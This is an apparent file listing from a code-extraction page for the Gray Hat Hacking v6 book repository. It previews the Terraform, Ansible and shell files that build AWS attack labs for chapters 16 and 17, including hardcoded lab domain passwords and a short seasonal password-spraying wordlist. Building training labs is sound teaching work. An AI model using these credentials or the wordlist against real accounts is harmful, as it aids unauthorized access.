"path": "ch16/Lab/ansible/roles/windows_local_group_membership/tasks/main.yml",
"chars": 193,
"preview": "---\n- name: add users to local groups for remote login\n win_group_membership:\n name: \"Remote Desktop Users\"\n "
},
{
"path": "ch16/Lab/ansible/vars/users.yml",
"chars": 333,
"preview": "---\n#domain_users:\n#- { name : \"target\", password : \"Winter2021\" , groups : \"\" }\n#- { name : \"ghhadmin\" , password : \"Gr"
},
{
"path": "ch16/Lab/ansible/vars/vars.yml",
"chars": 234,
"preview": "windows_domain_controller_info:\n dns_domain_name: ghh.local\n domain_admin_password: GrayHatHack1ng!\n domain_admin_"
},
{
"path": "ch16/Lab/build.sh",
"chars": 145,
"preview": "#!/bin/bash\n\ncd terraform \nterraform init && terraform validate && terraform apply\ncd ../ansible\nansible-playbook -i inv"
},
{
"path": "ch16/Lab/destroy.sh",
"chars": 43,
"preview": "#!/bin/bash\ncd terraform\nterraform destroy\n"
},
{
"path": "ch16/Lab/terminate-util.sh",
"chars": 468,
"preview": "#!/bin/bash\ninstance=`jq -r '.resources[] |select( .name == \"ghh_util\") | .instances[0].attributes.id ' terraform/terra"
},
{
"path": "ch16/Lab/terraform/aws_data.tf",
"chars": 706,
"preview": "data \"aws_availability_zones\" \"this\" {\n state = \"available\"\n}\n\ndata \"aws_ami\" \"ghh-kali\" {\n most_recent = true\n\n filt"
},
{
"path": "ch16/Lab/terraform/aws_hosts.tf",
"chars": 2012,
"preview": "\nlocals {\n dc-userdata = <<EOF\n<powershell>\n $admin = [adsi](\"WinNT://./administrator, user\")\n $admin.psbase.invoke(\""
},
{
"path": "ch16/Lab/terraform/inventory.tmpl",
"chars": 124,
"preview": "${cat}:\n hosts:\n%{for addr in ip_addrs ~}\n ${addr}:\n%{endfor ~}\n vars:\n%{for var in vars ~}\n ${var}\n%{endfor"
},
{
"path": "ch16/Lab/terraform/main.tf",
"chars": 150,
"preview": "provider \"aws\" {\n shared_credentials_file = var.shared_credentials_file\n region = \"us-east-1\"\n profi"
},
{
"path": "ch16/Lab/terraform/outputs.tf",
"chars": 2372,
"preview": "output \"dc_password\" { value = rsadecrypt(aws_instance.ghh_dc.password_data, file(var.key_path)) }\noutput \"target_pa"
},
{
"path": "ch16/Lab/terraform/terraform.tfvars-orig",
"chars": 34,
"preview": "key_path=\"<path to your SSH KEY>\"\n"
},
{
"path": "ch16/Lab/terraform/variables.tf",
"chars": 676,
"preview": "variable \"aws_region\" {\n default = \"us-east-1\"\n}\nvariable \"aws_profile\" {\n default = \"ghh\"\n}\nvariable \"dc_password\" {\n"
},
{
"path": "ch16/Lab/terraform/versions.tf",
"chars": 0,
"preview": ""
},
{
"path": "ch16/Lab/terraform/vpc.tf",
"chars": 2717,
"preview": "resource \"aws_vpc\" \"this\" {\n\n cidr_block = \"10.0.0.0/16\"\n enable_dns_hostnames = true\n enable_dns_support "
},
{
"path": "ch16/README.md",
"chars": 3057,
"preview": "# Gray Hat Hacking v6 Chapter 16\r\nThis directory contains all the components necessary for Chapter 16.\r\n\r\n## Lab Informa"
},
{
"path": "ch16/passwords.txt",
"chars": 70,
"preview": "Winter\nwinter\nSpring\nspring\nSummer\nsummer\nFall\nfall\nPassword\npassword\n"
},
{
"path": "ch17/Lab/ansible/ansible.cfg",
"chars": 66,
"preview": "[defaults]\nhost_key_checking = False\nenable_task_debugger = True\n\n"
},
{
"path": "ch17/Lab/ansible/ch17_playbook.yml",
"chars": 456,
"preview": "---\n- hosts: dc\n roles:\n - common\n - windows_dns_server\n - windows_domain_controller\n - windows_domain_user"
},
{
"path": "ch17/Lab/ansible/roles/common/defaults/main.yml",
"chars": 5,
"preview": "---\n\n"
}
]
// ... and 300 more files (download for full content)
About this extraction
This page contains the full source code of the GrayHatHacking/GHHv6 GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 500 files (174.8 MB), approximately 918.5k tokens, and a symbol index with 1168 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.